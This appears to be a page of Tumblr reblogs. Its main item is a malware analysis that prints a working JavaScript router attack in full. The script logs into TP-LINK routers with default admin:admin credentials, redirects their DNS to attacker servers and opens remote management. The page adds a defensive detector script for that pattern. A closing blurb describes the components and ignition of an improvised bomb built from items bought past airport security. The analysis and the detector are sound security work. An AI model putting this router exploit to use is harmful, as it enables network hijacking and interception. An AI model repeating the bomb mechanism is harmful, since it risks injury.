two-factor authentication is really cool, and it’s really great that tumblr is implementing it. You all should use it. 


Attacking home routers via JavaScript

kapravel:

We have recently noticed submissions on Wepawet that try to access local IP addresses. This is of particular interest since the attacker’s intention is to tamper with the configuration of the victim’s home router

A live example is located at http://freemdsv.com/ad.php?pid=20120811

// Note the single "=": MSIE is assigned the result of the comparison, so this
// block runs when the UA string does NOT contain "MSIE" (i.e. in non-IE browsers).
if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) {
    document.writeln("<div style=\'display:none\'>");

    // Fires only after the probe image below has loaded, i.e. after the router
    // accepted admin:admin. Rewrites the PPPoE advanced settings, including both
    // DNS servers, via a plain GET (a CSRF against the TP-LINK admin page).
    function ip1() {
        i = new Image;
        i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
    }
    // Probe: a 1x1 image fetched with credentials embedded in the URL. onload
    // only fires if the router is at 192.168.1.1 and still uses admin:admin.
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>');

    // Same trick, second payload: enable remote management on port 11 and
    // allow any source address (ip=0.0.0.0).
    function ip3() {
        ii = new Image;
        ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip3()>');
    document.writeln("</div>");
}

The script basically checks to see if the router is accessible through an image request to:

http://admin:admin@192.168.1.1/images/logo.jpg

So it expects that the router is left in the default configuration with username/password as admin:admin and that it is accessible from the IP address 192.168.1.1. The functions ip1 and ip3 are responsible for the malicious reconfiguration of the router with the following requests:

http ://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced

and

http ://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8

The file “PPPoECfgAdvRpm.htm” seems to be the configuration of PPPoE Advanced Settings for TP-LINK routers (link). It is very interesting that they change the victim’s DNS servers to 58.221.59.217 and 114.114.114.114, which means that the victim is susceptible to Man-in-the-middle attacks.


The second request reconfigures the router to be remotely accessible through its web interface (link). This way the attacker can remotely change the settings of the victim’s router at will.

A few reports from Wepawet that perform such attacks are here:

Wepawet report

If you see any related scripts in the wild or you have information what the DNS servers are targeting feel free to contact me on twitter: @kapravel
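As an added example (not code from kapravel's post or from Wepawet), here is a small static detector for the pattern described above: it pulls every http(s) URL out of a script, and flags requests aimed at private or loopback addresses that either carry credentials in the URL (user:pass@host) or set query parameters that look like DNS or remote-management settings. The parameter list and the verdict rule are my own heuristics; the sample script is constructed from the snippet above. Runs under Node.js, which provides the WHATWG URL class used for parsing.

```javascript
// Added example: heuristic detector for image-request CSRF against home routers.
// Not kapravel's code and not Wepawet's; the heuristics below are assumptions.

// Address ranges we treat as "local network" targets: RFC 1918, loopback, link-local.
const LOCAL_RANGES = [
  ["10.0.0.0", 8],
  ["172.16.0.0", 12],
  ["192.168.0.0", 16],
  ["127.0.0.0", 8],
  ["169.254.0.0", 16],
];

// Parameter names that, on consumer router admin pages, typically redirect the
// LAN's DNS or open the admin interface to the WAN. Heuristic, not exhaustive.
const SENSITIVE_PARAM = /^(dns|dnsserver\d*|primarydns|secondarydns|remote|port|ip|wanip)$/i;

// Dotted-quad string -> unsigned 32-bit integer, or null if it is not an IPv4 literal.
function ipv4ToInt(ip) {
  const parts = ip.split(".");
  if (parts.length !== 4) return null;
  let n = 0;
  for (const p of parts) {
    if (!/^\d{1,3}$/.test(p)) return null;
    const v = Number(p);
    if (v > 255) return null;
    n = n * 256 + v;
  }
  return n;
}

function isPrivateIPv4(host) {
  const n = ipv4ToInt(host);
  if (n === null) return false;
  return LOCAL_RANGES.some(([net, bits]) => {
    const mask = (0xffffffff << (32 - bits)) >>> 0;
    return ((n & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
  });
}

// Crude URL extraction that is adequate for document.write()/Image.src strings:
// stop at whitespace, quotes and angle brackets.
function extractUrls(source) {
  return source.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

function analyzeUrl(raw) {
  let u;
  try { u = new URL(raw); } catch (e) { return null; }
  const sensitiveParams = [...u.searchParams.entries()].filter(([k]) => SENSITIVE_PARAM.test(k));
  return {
    url: raw,
    host: u.hostname,
    privateTarget: isPrivateIPv4(u.hostname),
    credentials: u.username !== "" ? `${u.username}:${u.password}` : null,
    sensitiveParams, // [[name, value], ...]
  };
}

// A request is a "hit" when it targets a local address AND either embeds
// credentials (the admin:admin probe) or sets a sensitive parameter (the payload).
function analyzeScript(source) {
  const findings = extractUrls(source).map(analyzeUrl).filter(Boolean);
  const hits = findings.filter(f => f.privateTarget && (f.credentials !== null || f.sensitiveParams.length > 0));
  return { findings, hits, verdict: hits.length > 0 ? "router-csrf" : "clean" };
}

// Constructed sample: the script from the post, as it would be seen by a scanner.
const SAMPLE_SCRIPT = `
if (MSIE = navigator.userAgent.indexOf("MSIE") == -1) {
    document.writeln("<div style='display:none'>");
    function ip1() {
        i = new Image;
        i.src = 'http://192.168.1.1/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver=58.221.59.217&dnsserver2=114.114.114.114&downBandwidth=0&upBandwidth=0&Save=%B1%A3+%B4%E6&Advanced=Advanced';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip1()>');
    function ip3() {
        ii = new Image;
        ii.src = 'http://192.168.1.1/userRpm/ManageControlRpm.htm?port=11&ip=0.0.0.0&Save=%C8%B7+%B6%A8';
    }
    document.write('<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=ip3()>');
    document.writeln("</div>");
}`;

if (typeof require !== "undefined" && require.main === module) {
  const report = analyzeScript(SAMPLE_SCRIPT);
  console.log(report.verdict);
  for (const h of report.hits) console.log(h.host, h.credentials, JSON.stringify(h.sensitiveParams));
}
```

On the sample the verdict is "router-csrf" with four hits: two credentialed probes and two configuration requests, the first of which carries the two dnsserver values. A scanner would also want to follow up on what those DNS servers resolve, which this static check cannot do.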


Guy Builds Bomb Using Only Items Bought After Airport Security

Using only a stainless steel coffee mug, a Li-ion AA battery, along with some Axe Body Spray, a condom, and a bottle of water, this anarchistic MacGyver was able to build and successfully detonate an improvised bomb. 

It works by the water-filled condom breaking on impact when the device is thrown. This shorts the battery, creating heat that ignites the can of Axe body spray. It isn’t likely to bring down a plane, but the shrapnel one could pack into such a device could make for a legitimate terror concern.
